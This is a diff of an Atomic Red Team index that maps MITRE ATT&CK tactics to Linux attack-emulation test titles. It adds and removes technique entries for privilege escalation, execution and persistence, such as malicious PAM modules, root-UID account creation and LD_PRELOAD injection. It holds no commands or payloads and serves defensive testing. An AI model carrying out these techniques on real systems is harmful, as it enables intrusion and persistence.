+- T1216 Signed Script Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
   - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
@@ -231,90 +252,221 @@
   - Atomic Test #11: Login as nobody (Linux) [linux]
   - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# privilege-escalation
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #2: At - Schedule a job [linux]
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
+  - Atomic Test #8: Create local account (Linux) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# execution
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1047 Windows Management Instrumentation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.002 Inter-Process Communication: Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.001 Command and Scripting Interpreter: PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.011 Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
+  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
+  - Atomic Test #2: Execute Python via scripts [linux]
+  - Atomic Test #3: Execute Python via Python executables [linux]
+  - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
+- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.003 Command and Scripting Interpreter: Windows Command Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
+  - Atomic Test #3: psexec.py (Impacket) [linux]
+- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
+  - Atomic Test #2: At - Schedule a job [linux]
 
 # persistence
+- T1053.005 Scheduled Task/Job: Scheduled Task [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
-  - Atomic Test #1: Malicious PAM rule [linux]
-  - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
-  - Atomic Test #3: Malicious PAM module [linux]
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.013 Event Triggered Execution: PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
-  - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
-  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
-  - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
-  - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
+- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1543.003 Create or Modify System Process: Windows Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.012 Boot or Logon Autostart Execution: Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.005 Server Software Component: Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
   - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
   - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.011 Event Triggered Execution: Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.010 Boot or Logon Autostart Execution: Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.009 Boot or Logon Autostart Execution: Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.005 Boot or Logon Autostart Execution: Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
-  - Atomic Test #1: Trap EXIT [macos, linux]
-  - Atomic Test #2: Trap EXIT (freebsd) [linux]
-  - Atomic Test #3: Trap SIGINT [macos, linux]
-  - Atomic Test #4: Trap SIGINT (freebsd) [linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
-  - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
   - Atomic Test #1: Create a user account on a Linux system [linux]
   - Atomic Test #2: Create a user account on a FreeBSD system [linux]
   - Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
   - Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
-  - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
   - Atomic Test #4: Active Directory Create Admin Account [linux]
   - Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
-  - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
-  - Atomic Test #1: Create Systemd Service and Timer [linux]
-  - Atomic Test #2: Create a user level transient systemd service and timer [linux]
-  - Atomic Test #3: Create a system level transient systemd service and timer [linux]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
-  - Atomic Test #1: Add command to .bash_profile [macos, linux]
-  - Atomic Test #2: Add command to .bashrc [macos, linux]
-  - Atomic Test #3: Add command to .shrc [linux]
-  - Atomic Test #4: Append to the system shell profile [linux]
-  - Atomic Test #5: Append commands user shell profile [linux]
-  - Atomic Test #6: System shell profile scripts [linux]
-  - Atomic Test #7: Create/Append to .bash_logout [linux]
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
-  - Atomic Test #2: rc.common [linux]
-  - Atomic Test #3: rc.local [linux]
-- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
-  - Atomic Test #1: Create Systemd Service [linux]
-  - Atomic Test #2: Create SysV Service [linux]
-  - Atomic Test #3: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #2: At - Schedule a job [linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #8: Create local account (Linux) [linux]
@@ -322,6 +474,7 @@
   - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
   - Atomic Test #11: Login as nobody (Linux) [linux]
   - Atomic Test #12: Login as nobody (freebsd) [linux]
